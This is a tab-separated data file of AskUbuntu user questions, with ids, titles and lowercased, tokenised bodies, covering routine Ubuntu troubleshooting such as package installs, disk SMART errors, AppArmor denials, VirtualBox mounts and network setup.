490652	uwsgi does not start after being installed with launchpad ppa . installed version : 2.0.3-debian	sudo-apt get install uwsgi on 12.04 results in installing 1.x version of uwsgi which has a lot of bugs and is outdated . after reading on askubuntu i added launchpad ppa 's to my sources.list : deb http : //ppa.launchpad.net/chris-lea/uwsgi/ubuntu precise main deb-src http : //ppa.launchpad.net/chris-lea/uwsgi/ubuntu precise main now when i run sudo-apt get update and sudo apt-get install uwsgi , 2.03 version of uwsgi gets installed but it is not able to start . below is the error thrown : **invoke-rc.d : initscript uwsgi , action `` start '' failed . dpkg : error processing uwsgi ( -- configure ) : subprocess installed post-installation script returned error exit status**
490657	xubuntu/xfce4 package to hold to prevent breakage by updates	i 've painfully set up my xubuntu desktop to look exactly how i want it to look . i have previously experienced a well built setup crumble due to unfortunate updates . though i would like to keep getting updates for applications , linux headers , drivers etc , i would like to keep the desktop itself untouched . what is the complete list of packages i need to hold to keep my desktop environment from changing unknowingly ? here is my current system : ubuntu 14.04 ( 64-bit ) with xubuntu installed later and unity removed xfce ver . 4.10 i want to hold packages using apt-mark hold < package-name >
490659	mts ultra wifi device not working in ubuntu 13.10 via usb	i would like to use an mts wifi usb . i could able to create a network connection manually using the credentials internet @ internet.mtsindia.in , # 777 , password mts , but i can not access the internet.also while creating the connection the mobile broadband device is not shown in the dropdown . i can access the internet only through wifi , the manual connection is not working in my pc . am using ubuntu 13.10 . thanks
490663	mounting virtual shared folder - mount succeeds , but any access to folders hangs	i have been using the following script to mount virtual box shared drives in my guest ubuntu ( with host windows ) # ! /bin/bash # mounts all known drives shared via virtual box # configuration mount_point= '' $ { home } /media '' mount_dirs= '' foo bar baz '' userid= $ ( id -u ) groupid= $ ( id -g ) for dir in $ { mount_dirs } ; do mkdir -p $ { mount_point } / $ { dir } sudo mount -t vboxsf -o rw , uid= $ { userid } , gid= $ { groupid } $ { dir } $ { mount_point } / $ { dir } done this has served me well until a recent upgrade of the linux kernel , to 3.11.0-24 , after which this occurred . now this script succeed when run , mounting occurs without hitch . however any form of access to the folder results in an indefinitely long wait . ls ~/media works fine , but ls ~/media/foo hangs indefinitely , doing nothing . what can i try or further diagnose to fix this problem ? system details : $ uname -a & & lsb_release -a linux brendang-linux 3.11.0-24-generic # 41-ubuntu smp mon jun 9 20:36:00 utc 2014 x86_64 x86_64 x86_64 gnu/linux no lsb modules are available . distributor id : ubuntu description : ubuntu 13.10 release : 13.10 codename : saucy
490664	mac wireless keyboard does n't work in grub 2	i have just installed ubuntu 14.04 and now i cant boot into mac osx anymore . i am using the standard wireless keyboard that all apple computers come with and it doesnt work at all in the grub 2 menu when booting up and automatically boots ubuntu after 10 seconds . is there any way of using a wireless keyboard for this ? and if not , is there a way to remove ubuntu while running it ?
490666	what is the procedure in ubuntu 14.04 when replacing or adding hardware	i 've installed ubuntu 14.04 on a desktop pc and want to add a pci-express color card to the system . what will ubuntu 's reaction be to the new hardware added , will it detect and probe the device and install the necessary driver ( s ) ? or should i rather reinstall ubuntu with the new hardware attached ? thank you .
490667	too expanded launcher icons on bottom panel in ubuntu 14.04 gnome flashback ( metacity )	when i upgraded ubuntu from 12.04 to 14.04 ( through 12.10 , 13.04 , 13.10 ) my launcher ( shortcut ) icons on the bottom panel expanded ( previously they occupied one fourth of panel , not one third ) . i would like to get them back to previous state or even more compact . i can not do that with super+alt+right click - properties of panel does n't have option for this settings . can that be done in some other way ? i 'm using gnome flashback ( metacity ) ...
490668	could i try ubuntu 14 before permanent install ?	i got som problems with my ubuntu 12 after an update . the display does not work any more , can not find nvidia-173 . since there is a 14 out now i wonder if i could create the image on a cd and boot the computer with that to see if everything works before i permanatly install it ? if that is possible , could i also browse the files and create a backup of some files that i have on the computer ? i think i have `` home '' on one partion and the os on an other partion that might be crucial if i will do an upgrade-install and still have my files left . but how can i check that before ? best regards fredrik
490669	what to learn ubuntu application development in python , where to start ?	i know basic python and i love it . i want to learn how to develop and publish ubuntu applications in python but do n't know where to start ( i mean `` the standard ways '' to do so ) . it would be good if you can also suggest best gui toolkit to learn . i would prefer you to answer in the perspective of python-3.4 . thank you in advance .
490670	mts ultra wifi manual connection not working	i would like to use a mts wi-fi usb . i could able to create a network connection manually using the credentials internet @ internet.mtsindia.in , # 777 , password mts , but i can not access the internet.also while creating the connection the mobile broadband device is not shown in the dropdown . i can access the internet only through wi-fi , the manual connection is not working in my pc . am using ubuntu 13.10 .
490671	fix half-installed package	i am getting error while using sudo apt-get upgrade stating : dpkg : error processing libgfortran3 : amd64 ( -- configure ) : package libgfortran3 : amd64 is not ready for configuration can not configure ( current status `half-installed ' ) errors were encountered while processing : libgfortran3 : amd64 e : sub-process /usr/bin/dpkg returned an error code ( 1 ) it does not seem to block the installation/upgrade other applications . i believe this problem arose due to direct shutting down of my pc while the application was being upgraded . how can i fix this ?
490683	hp proliant dl 380 g4 and open stack	i have 2 old hp proliant servers ( dl 380 g4 ) will these machines run open stack ? if so what is the most version of open stack they will run ? kind regards adam ps i have been able to install win7 x 32 bit on them . it runs no problem ... not sure about 64 bit version though .
490684	smart tests show rapidly oscillating hardware ecc recovered value	i have been subjected to an unholy amount of pain from my desktop tonight , including the near-loss of data due to corruption ( in the /tmp directory ! ? ) on one disk and erratic behavior from the other disk . one disk is used for file storage , and the other is used solely for swap space . the swap space hdd ( 40gb ) gave me this response ( at bottom ) after running sudo smartctl -- all /dev/sda . the issues that i was suspicious of were the value for hardware ecc recovered ( which has been fluctuating from the high 10000s up to the high 40000s very rapidly recently ) : id # attribute_name flag value worst thresh type updated when_failed raw_value 195 hardware_ecc_recovered 0x000a 252 251 000 old_age always - 41212 and these errors : smart error log version : 1 warning : ata error count 31 inconsistent with error log pointer 5 ata error count : 31 ( device log contains only the most recent five errors ) cr = command register [ hex ] fr = features register [ hex ] sc = sector count register [ hex ] sn = sector number register [ hex ] cl = cylinder low register [ hex ] ch = cylinder high register [ hex ] dh = device/head register [ hex ] dc = device command register [ hex ] er = error register [ hex ] st = status register [ hex ] powered_up_time is measured from power on , and printed as ddd+hh : mm : ss.sss where dd=days , hh=hours , mm=minutes , ss=sec , and sss=millisec . it `` wraps '' after 49.710 days . error 31 occurred at disk power-on lifetime : 38693 hours ( 1612 days + 5 hours ) when the command that caused the error occurred , the device was in an unknown state . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 01 51 04 6c d7 72 e1 error : amnf 4 sectors at lba = 0x0172d76c = 24303468 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 04 6c d7 72 e1 08 00:23:02.400 read dma f8 00 00 00 00 00 e0 08 00:23:02.400 read native max address [ obs-acs-3 ] ec 00 00 00 00 00 a0 0a 00:23:02.384 identify device ef 03 45 00 00 00 a0 0a 00:23:02.368 set features [ set transfer mode ] f8 00 00 00 00 00 e0 08 00:23:02.368 read native max address [ obs-acs-3 ] error 30 occurred at disk power-on lifetime : 38693 hours ( 1612 days + 5 hours ) when the command that caused the error occurred , the device was in an unknown state . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 04 6c d7 72 e1 error : unc 4 sectors at lba = 0x0172d76c = 24303468 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 04 6c d7 72 e1 08 00:23:01.072 read dma f8 00 00 00 00 00 e0 08 00:23:01.056 read native max address [ obs-acs-3 ] ec 00 00 00 00 00 a0 0a 00:23:01.040 identify device ef 03 45 00 00 00 a0 0a 00:23:01.024 set features [ set transfer mode ] f8 00 00 00 00 00 e0 08 00:23:01.024 read native max address [ obs-acs-3 ] error 29 occurred at disk power-on lifetime : 38693 hours ( 1612 days + 5 hours ) when the command that caused the error occurred , the device was in an unknown state . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 04 6c d7 72 e1 error : unc 4 sectors at lba = 0x0172d76c = 24303468 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 04 6c d7 72 e1 08 00:22:59.728 read dma f8 00 00 00 00 00 e0 08 00:22:59.712 read native max address [ obs-acs-3 ] ec 00 00 00 00 00 a0 0a 00:22:59.696 identify device ef 03 45 00 00 00 a0 0a 00:22:59.680 set features [ set transfer mode ] f8 00 00 00 00 00 e0 08 00:22:59.680 read native max address [ obs-acs-3 ] error 28 occurred at disk power-on lifetime : 38693 hours ( 1612 days + 5 hours ) when the command that caused the error occurred , the device was in an unknown state . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 01 51 04 6c d7 72 e1 error : amnf 4 sectors at lba = 0x0172d76c = 24303468 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 04 6c d7 72 e1 08 00:22:58.576 read dma f8 00 00 00 00 00 e0 08 00:22:58.560 read native max address [ obs-acs-3 ] ec 00 00 00 00 00 a0 0a 00:22:58.544 identify device ef 03 45 00 00 00 a0 0a 00:22:58.528 set features [ set transfer mode ] f8 00 00 00 00 00 e0 08 00:22:58.528 read native max address [ obs-acs-3 ] error 27 occurred at disk power-on lifetime : 38693 hours ( 1612 days + 5 hours ) when the command that caused the error occurred , the device was in an unknown state . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 04 6c d7 72 e1 error : unc 4 sectors at lba = 0x0172d76c = 24303468 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 04 6c d7 72 e1 08 00:22:57.232 read dma f8 00 00 00 00 00 e0 08 00:22:57.216 read native max address [ obs-acs-3 ] ec 00 00 00 00 00 a0 0a 00:22:57.200 identify device ef 03 45 00 00 00 a0 0a 00:22:57.184 set features [ set transfer mode ] f8 00 00 00 00 00 e0 08 00:22:57.184 read native max address [ obs-acs-3 ] smart self-test log structure revision number 1 no self-tests have been logged . [ to run self-tests , use : smartctl -t ] bottom line , i do n't know whether to replace the drive or not . please help me figure out if i should replace it , and why i should replace it . thanks so much . actual output : smartctl 6.2 2013-07-26 r3841 [ i686-linux-3.13.0-24-generic ] ( local build ) copyright ( c ) 2002-13 , bruce allen , christian franke , www.smartmontools.org === start of information section === model family : maxtor diamondmax plus 8 device model : maxtor 6e040l0 serial number : e17zae3e firmware version : nar61590 user capacity : 40,016,019,456 bytes [ 40.0 gb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : ata/atapi-7 t13/1532d revision 0 local time is : wed jul 2 01:27:30 2014 mdt smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x82 ) offline data collection activity was completed without error . auto offline data collection : enabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 1021 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . no general purpose logging support . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 17 ) minutes . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 3 spin_up_time 0x0027 234 221 063 pre-fail always - 5949 4 start_stop_count 0x0032 250 250 000 old_age always - 7874 5 reallocated_sector_ct 0x0033 253 253 063 pre-fail always - 0 6 read_channel_margin 0x0001 253 253 100 pre-fail offline - 0 7 seek_error_rate 0x000a 253 252 000 old_age always - 0 8 seek_time_performance 0x0027 253 239 187 pre-fail always - 50786 9 power_on_minutes 0x0032 130 130 000 old_age always - 148h+23m 10 spin_retry_count 0x002b 253 247 157 pre-fail always - 0 11 calibration_retry_count 0x002b 253 252 223 pre-fail always - 0 12 power_cycle_count 0x0032 248 248 000 old_age always - 2041 192 power-off_retract_count 0x0032 252 252 000 old_age always - 1406 193 load_cycle_count 0x0032 251 251 000 old_age always - 10723 194 temperature_celsius 0x0032 253 253 000 old_age always - 39 195 hardware_ecc_recovered 0x000a 252 251 000 old_age always - 41212 196 reallocated_event_count 0x0008 253 253 000 old_age offline - 0 197 current_pending_sector 0x0008 253 253 000 old_age offline - 0 198 offline_uncorrectable 0x0008 253 253 000 old_age offline - 0 199 udma_crc_error_count 0x0008 199 199 000 old_age offline - 0 200 multi_zone_error_rate 0x000a 253 252 000 old_age always - 0 201 soft_read_error_rate 0x000a 253 250 000 old_age always - 0 202 data_address_mark_errs 0x000a 253 252 000 old_age always - 0 203 run_out_cancel 0x000b 253 252 180 pre-fail always - 1 204 soft_ecc_correction 0x000a 253 252 000 old_age always - 0 205 thermal_asperity_rate 0x000a 253 252 000 old_age always - 0 207 spin_high_current 0x002a 253 247 000 old_age always - 0 208 spin_buzz 0x002a 253 252 000 old_age always - 0 209 offline_seek_performnce 0x0024 184 183 000 old_age offline - 0 99 unknown_attribute 0x0004 253 253 000 old_age offline - 0 100 unknown_attribute 0x0004 253 253 000 old_age offline - 0 101 unknown_attribute 0x0004 253 253 000 old_age offline - 0 smart error log version : 1 warning : ata error count 31 inconsistent with error log pointer 5 ata error count : 31 ( device log contains only the most recent five errors ) cr = command register [ hex ] fr = features register [ hex ] sc = sector count register [ hex ] sn = sector number register [ hex ] cl = cylinder low register [ hex ] ch = cylinder high register [ hex ] dh = device/head register [ hex ] dc = device command register [ hex ] er = error register [ hex ] st = status register [ hex ] powered_up_time is measured from power on , and printed as ddd+hh : mm : ss.sss where dd=days , hh=hours , mm=minutes , ss=sec , and sss=millisec . it `` wraps '' after 49.710 days . error 31 occurred at disk power-on lifetime : 38693 hours ( 1612 days + 5 hours ) when the command that caused the error occurred , the device was in an unknown state . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 01 51 04 6c d7 72 e1 error : amnf 4 sectors at lba = 0x0172d76c = 24303468 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 04 6c d7 72 e1 08 00:23:02.400 read dma f8 00 00 00 00 00 e0 08 00:23:02.400 read native max address [ obs-acs-3 ] ec 00 00 00 00 00 a0 0a 00:23:02.384 identify device ef 03 45 00 00 00 a0 0a 00:23:02.368 set features [ set transfer mode ] f8 00 00 00 00 00 e0 08 00:23:02.368 read native max address [ obs-acs-3 ] error 30 occurred at disk power-on lifetime : 38693 hours ( 1612 days + 5 hours ) when the command that caused the error occurred , the device was in an unknown state . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 04 6c d7 72 e1 error : unc 4 sectors at lba = 0x0172d76c = 24303468 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 04 6c d7 72 e1 08 00:23:01.072 read dma f8 00 00 00 00 00 e0 08 00:23:01.056 read native max address [ obs-acs-3 ] ec 00 00 00 00 00 a0 0a 00:23:01.040 identify device ef 03 45 00 00 00 a0 0a 00:23:01.024 set features [ set transfer mode ] f8 00 00 00 00 00 e0 08 00:23:01.024 read native max address [ obs-acs-3 ] error 29 occurred at disk power-on lifetime : 38693 hours ( 1612 days + 5 hours ) when the command that caused the error occurred , the device was in an unknown state . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 04 6c d7 72 e1 error : unc 4 sectors at lba = 0x0172d76c = 24303468 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 04 6c d7 72 e1 08 00:22:59.728 read dma f8 00 00 00 00 00 e0 08 00:22:59.712 read native max address [ obs-acs-3 ] ec 00 00 00 00 00 a0 0a 00:22:59.696 identify device ef 03 45 00 00 00 a0 0a 00:22:59.680 set features [ set transfer mode ] f8 00 00 00 00 00 e0 08 00:22:59.680 read native max address [ obs-acs-3 ] error 28 occurred at disk power-on lifetime : 38693 hours ( 1612 days + 5 hours ) when the command that caused the error occurred , the device was in an unknown state . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 01 51 04 6c d7 72 e1 error : amnf 4 sectors at lba = 0x0172d76c = 24303468 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 04 6c d7 72 e1 08 00:22:58.576 read dma f8 00 00 00 00 00 e0 08 00:22:58.560 read native max address [ obs-acs-3 ] ec 00 00 00 00 00 a0 0a 00:22:58.544 identify device ef 03 45 00 00 00 a0 0a 00:22:58.528 set features [ set transfer mode ] f8 00 00 00 00 00 e0 08 00:22:58.528 read native max address [ obs-acs-3 ] error 27 occurred at disk power-on lifetime : 38693 hours ( 1612 days + 5 hours ) when the command that caused the error occurred , the device was in an unknown state . after command completion occurred , registers were : er st sc sn cl ch dh -- -- -- -- -- -- -- 40 51 04 6c d7 72 e1 error : unc 4 sectors at lba = 0x0172d76c = 24303468 commands leading to the command that caused the error were : cr fr sc sn cl ch dh dc powered_up_time command/feature_name -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- c8 00 04 6c d7 72 e1 08 00:22:57.232 read dma f8 00 00 00 00 00 e0 08 00:22:57.216 read native max address [ obs-acs-3 ] ec 00 00 00 00 00 a0 0a 00:22:57.200 identify device ef 03 45 00 00 00 a0 0a 00:22:57.184 set features [ set transfer mode ] f8 00 00 00 00 00 e0 08 00:22:57.184 read native max address [ obs-acs-3 ] smart self-test log structure revision number 1 no self-tests have been logged . [ to run self-tests , use : smartctl -t ] smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay .
490686	how do i make a custom path identifier ?	to define what i mean by `` custom path identifier '' , i mean a short set of character ( s ) that represent a whole path , and example of this would be the ~ , if you type cd ~ in your terminal emulator it will go to your home folder . but i 'd like to make a custom one for a different path . i looked in the .bashrc folder for hints on how to do this , but i could find anything unfortunately . the `` custom path identifier '' i 'm trying to make is ~~ to /home/myuser/applications/custom/java/ . since i 'm going to be using that path a lot ( and daily ) i do n't want to keep retyping the whole path , and just typing ~~ would be nice . i tried using the alias command : alias ~~= '' /home/myuser/applications/custom/java/ '' but , unfortunately this did not work . on the side note , i apologize if i used the wrong terminology for anything , i 'm fairly new to all this linux stuff and i know very little . so thanks for any extra information i get .
490690	how to fix apparmor= '' denied '' for telepathy-mission-control-5 under ubuntu 14.04 ?	just installed ubuntu 14.04 lts a week ago and a few programs for my work & fun : nginx server , rabbitmq server , mysql server php-fpm , hhvm sublime-text , mysql workbench hplib ( for printer/scanner ) composer , bower , nodejs , npm vlc player steam ( no games installed yet ) nothing really fancy . i 've also installed plasma-desktop ( to try out it 's widgets ) , but after a few hours i uninstalled it with -- purge and then apt-get autoremove . today , upon logging in i saw an error message 3 times . first occured after entering my password on login screen , but before my desktop loaded ( it appeared `` on top of login screen '' ) . second message , appeared just after the login screen disappeared , and desktop started loading . the third message appeared when desktop finished loading . no idea when the 4th happened . since that time it 's been about 20 minutes and no further error messages . so , i 've looked up /etc/syslog and here we go : jul 2 09:26:48 earth kernel : [ 1090.959820 ] type=1400 audit ( 1404286008.832:76 ) : apparmor= '' denied '' operation= '' open '' profile= '' /usr/lib/telepathy/mission-control-5 '' name=2f6d656469612f53746f726167652f50726f66696c652f5562756e74752031342e30342f6c6f6f7374726f2f2e636f6e6669672f6c69626163636f756e74732d676c69622f6163636f756e74732e6462 pid=3310 comm= '' mission-control '' requested_mask= '' rw '' denied_mask= '' rw '' fsuid=1000 ouid=1000 jul 2 09:26:48 earth kernel : [ 1090.960061 ] type=1400 audit ( 1404286008.832:77 ) : apparmor= '' denied '' operation= '' open '' profile= '' /usr/lib/telepathy/mission-control-5 '' name=2f6d656469612f53746f726167652f50726f66696c652f5562756e74752031342e30342f6c6f6f7374726f2f2e636f6e6669672f6c69626163636f756e74732d676c69622f6163636f756e74732e6462 pid=3310 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 jul 2 09:26:48 earth kernel : [ 1090.967927 ] type=1400 audit ( 1404286008.840:78 ) : apparmor= '' denied '' operation= '' open '' profile= '' /usr/lib/telepathy/mission-control-5 '' name=2f6d656469612f53746f726167652f50726f66696c652f5562756e74752031342e30342f6c6f6f7374726f2f2e636f6e6669672f64636f6e662f75736572 pid=3310 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 jul 2 09:26:48 earth kernel : [ 1091.034552 ] type=1400 audit ( 1404286008.908:79 ) : apparmor= '' denied '' operation= '' open '' profile= '' /usr/lib/telepathy/mission-control-5 '' name=2f6d656469612f53746f726167652f50726f66696c652f5562756e74752031342e30342f6c6f6f7374726f2f2e6c6f63616c2f73686172652f74656c6570617468792f6d697373696f6e2d636f6e74726f6c2f6163636f756e74732e636667 pid=3310 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=1000 note the name part looks completely rubbish . i 've googled this error message , and found a few bug reports : # 1190865 # 1217618 # 1320394 they say it 's an error in apparmor , but no clues how to fix it . also , i do n't remember installing telepathy-mission-control-5 . i 've looked up reverse dependencies : loostro @ earth : ~ $ apt-cache rdepends telepathy-mission-control-5 telepathy-mission-control-5 reverse depends : telepathy-gabble : i386 gnome-shell telepathy-gabble mcp-account-manager-uoa empathy telepathy-mission-control-5 : i386 telepathy-gabble : i386 telephony-service ssh-contact-client python-sugar3 python-sugar-toolkit-0.98 python-sugar-toolkit-0.96 kde-telepathy-minimal gnome-shell telepathy-mission-control-5-dbg telepathy-gabble mcp-account-manager-uoa libmission-control-plugins0 empathy well , it seems alot of stuff depends in it . it does not look like i can simply uninstall it , as it would probably break something . is there a way to fix this ? how ?
490691	problems with burg on ubuntu 14.04	i have installed buc , burg manager and burg works fine . when i reboot my laptop ( ubuntu 14.04 & win 7 ) , i get the burg default display ( nearly the same like grub ) . if i install and change a theme with the burg manager , it saves everything but burg emu and reboot also displays the default theme . i have tried the gui method by using burg manager to install burg and themes , tried the terminal method , and also tried another gui method by using grub-optimizer , which also is able to configure burg . did i forget something ? edit : i 've fixed the problem . in the burg.cfg file was the absolute path to the theme , but it is enough if you write down just the theme name ( if themes are installed correct ) . now it works fine )
490693	why is eclipse luna dark theme ugly ?	eclipse luna ships with an integrated dark theme , i downloaded eclipse cdt and deleted my workspace to reset eclipse configuration . i switched to the dark theme and restarted eclipse ; the ui does n't look like expected : i also have checked for updates within eclipse ( no update found ) the theme is supposed to look like the screenshots in the link .
490694	how can i start a program minimised , and restore maximised ?	there are various options to start a program minimised , or to start a program maximised and they work well , but i 'm always looking for new challenges . if i start a program minimised using the devil 's pie method , and then click on it in the launcher , it restores to its regular size . instead , i would like it to restore to a maximised state . in other words , i want it to act as though it had started maximised , and then been minimised .
490696	is there a hindi to hindi dictionary ?	i want a hindi - hindi dictionary app for my ubuntu 14.04 lts . if there is one , please tell me about one . thank you .
490697	xserver shows just the icons on the second screen	i would like to have two different xserver sessions , because i want to use the same machine from two differet computer by vnc . i mean we are two different person that need to work in the same server , with vnc , at the same time . so , to do that , i tried opening a second xserver session ( in the server machine ) , to connect each user on a different session . to do that , i typed ctrl + alt + f1 and then the command startx -- :1 . then if i try typing ctrl + alt + f1 to switch the screen it appears another desktop which shows just the icons on it . i mean it is impossible to do anything on the second screen . am i missing anything ?
490699	texstudio problem in 14.04 : no info on mouse hovering	ubuntu 14.04 : if i hover the mouse over the upper symbols in texstudio little yellow areas appear , but there is no text in them . what to do ?
490700	workspace overlap	i 'm new to ubuntu , less than two months . 60 year old male , been using computers ( dos then windows ) since the early 90 's . i had thought that workspaces would be seperate but find that is not the case . i can be working in workspace 4 and still get sounds and pop-ups from applications running in workspace 1 . is there a way to prevent that from happening ?
490702	ping the fqdn failed but 'short name ' works	i 'm on an enterprise lan ( windows domain and windows dns server ) and i want to access to another computers on lan ( mostly in https ) on my ubuntu ( 14.04 , fresh install ) when i do : ping my_other_server_on_lan - > it works ping my_other_server_on_lan.mydomain.local - > it does n't work i tried to change some configuration in /etc/resolv.conf but nothing works how to ping both myserver and myserver.mydomain.local ? i do n't understand why when i precise the dns extension edit : i do n't need to access to my computer via the fqdn name it is to access to other servers on the lan
490706	remove letters and dots from all lines	i have a csv that has the output of time commands of different programs including the id of the execution . therefore my files contain records in the following form : id , execution_time example record : 345,0m0.047s i only need the number of execution and the number of seconds . therefore the above record needs to be 345,0047 ( without the `` 0m '' the `` . '' and the `` s '' ) . is it possible to achieve that ?
490707	13.10 to 14.04 upgrade aborted but then completed	i was upgrading from 13.10 t0 14.04 and the system said : '' could not install the upgrades the upgrade has aborted . your system could be in an unusable state . a recovery will run now ( dpkg -- configure -a ) . '' after running this recovery it said the upgrade was complete but that there may be problems . any advice ? ( i am an ignorant man so please say it in very simple , step by step terms ! : - ) thank you !
490709	logon failed , please check your name/password . zarafa on ubuntu server 12.04	i 'm trying to configure zarafa ( for test ) following this guide : http : //www.zarafa.com/wiki/index.php/installing_zarafa_from_packages ( on ubuntu server 12.04 ) on a v.m . ( virtualbox ) i have just installed these dependencies : apt-get install php5-cli php-gettext mktemp gawk xsltproc poppler-utils unzip catdoc libboost-filesystem1.46.1 libboost-system1.46.1 libicu48 w3m python-mysqldb apache2-mpm-prefork libapache2-mod-php5 mysql-server python-support libpython2.7 libcurl3 but when i try to login to webaccess or webapp ( as explained in the guide with the test user ) i got this error : `` logon failed , please check your name/password . '' how can i resolve this issue ? ? any help be appreciate !
490711	configure dummy sound device on server	question : how to configure a dummy sound device on a ubuntu 14.04 server which has no sound hw ? i basically just want various apps , aplay as a concrete target , to be happy , like they 'd be if the system had real sound card . how the solution mixes alsa , pulseaudio , oss , or whatever , that does n't matter . what i have done currently : at the moment i have just added this one line to /etc/modules : snd-dummy and after reboot , lsmod | grep snd output is this : snd_dummy 20483 0 snd_pcm 102099 1 snd_dummy snd_page_alloc 18710 1 snd_pcm snd_seq_midi 13324 0 snd_seq_midi_event 14899 1 snd_seq_midi snd_rawmidi 30144 1 snd_seq_midi snd_seq 61560 2 snd_seq_midi_event , snd_seq_midi snd_seq_device 14497 3 snd_seq , snd_rawmidi , snd_seq_midi snd_timer 29482 2 snd_pcm , snd_seq snd 69238 7 snd_dummy , snd_timer , snd_pcm , snd_seq , snd_rawmidi , snd_seq_device , snd_seq_midi soundcore 12680 1 snd but , it seems i need to do more , because ... what kind of problem i see : when i run aplay /usr/share/sounds/alsa/noise.wav , i get : alsa lib confmisc.c:768 : ( parse_card ) can not find card '0' alsa lib conf.c:4248 : ( _snd_config_evaluate ) function snd_func_card_driver returned error : no such file or directory alsa lib confmisc.c:392 : ( snd_func_concat ) error evaluating strings alsa lib conf.c:4248 : ( _snd_config_evaluate ) function snd_func_concat returned error : no such file or directory alsa lib confmisc.c:1251 : ( snd_func_refer ) error evaluating name alsa lib conf.c:4248 : ( _snd_config_evaluate ) function snd_func_refer returned error : no such file or directory alsa lib conf.c:4727 : ( snd_config_expand ) evaluate error : no such file or directory alsa lib pcm.c:2239 : ( snd_pcm_open_noupdate ) unknown pcm default aplay : main:722 : audio open error : no such file or directory so , either i 'm missing some configuration , or i have somehow corrupted setup . i 'd appreciate either stand-alone instructions on how to make this work on ubuntu 14.04 , or troubleshooting help if it looks like i have somehow corrupted system .
